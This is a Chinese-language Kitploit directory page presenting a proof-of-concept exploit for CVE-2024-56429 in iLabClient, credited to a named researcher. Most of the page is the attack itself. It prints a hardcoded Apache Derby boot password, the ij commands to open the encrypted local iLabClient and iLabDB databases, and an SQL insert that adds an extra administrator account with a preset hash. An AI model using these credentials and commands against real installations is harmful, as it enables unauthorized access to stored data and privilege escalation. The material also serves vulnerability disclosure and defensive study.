Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-56429 — CVE-2024-56429 的漏洞利用程序,演示如何从 iLabClient 源代码中提取 Apache Derby 数据库启动密码,从而允许本地数据库连接并通过用户操纵实现权限提升。 | Kitploit
工具/GitHubGitHub/lisa-2905/cve-2024-56429
权限提升密码攻击漏洞分析漏洞利用数据库安全
GitHublisa-2905/cve-2024-56429

CVE-2024-56429

CVE-2024-56429 的漏洞利用程序,演示如何从 iLabClient 源代码中提取 Apache Derby 数据库启动密码,从而允许本地数据库连接并通过用户操纵实现权限提升。

查看仓库
61年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-56429

访问iLabClient的本地数据库


提取数据库密码

iLabClient 使用 Apache Derby 数据库存储本地所需数据。为确保加密,创建时使用了 bootPassword,该密码可从源代码中提取 (提取出的代码位于 DecyptedBootPassword.java)。执行提取出的源代码后, 用户即可获得 bootPassword。

root@kitploit:~
jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==

连接数据库

首次启动 iLabClient 时,会创建 iLabCLient 和 iLabDB 两个本地数据库。 要连接这些数据库,可以使用 Apache Derby 提供的 ij 工具,下载。

启动 ij:

root@kitploit:~
"C:\ilabClient\java8u422\bin\java.exe" -jar "...\db-derby-10.14.2.0-lib\lib\derbyrun.jar" ij

"C:\ilabClient\java8u422\bin\java.exe": iLabClient 安装并使用的 Java 版本
"...\db-derby-10.14.2.0-lib\lib\derbyrun.jar": Apache Derby 库

连接数据库:

root@kitploit:~
cd "C:\ilabClient\db
connect 'jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';
connect 'jdbc:derby:iLabDB;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';

操作数据(示例)

建立连接后,即可读取和操作数据。例如,通过添加另一个拥有更多权限的用户。

root@kitploit:~
 insert into users (USERID, BENUTZER, NAME, PARAMS, HASH) values (4, 'admin2', 'Administrator', '111111111111111111', 'SHA-256:B6382EC801B1BBD5C464C6A5F9C8CFFDC603A7D3A4916B1F50BD592678E8380B');

所需的哈希可以使用 GenerateUserData.java 类生成。


发现者:Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)

下载工具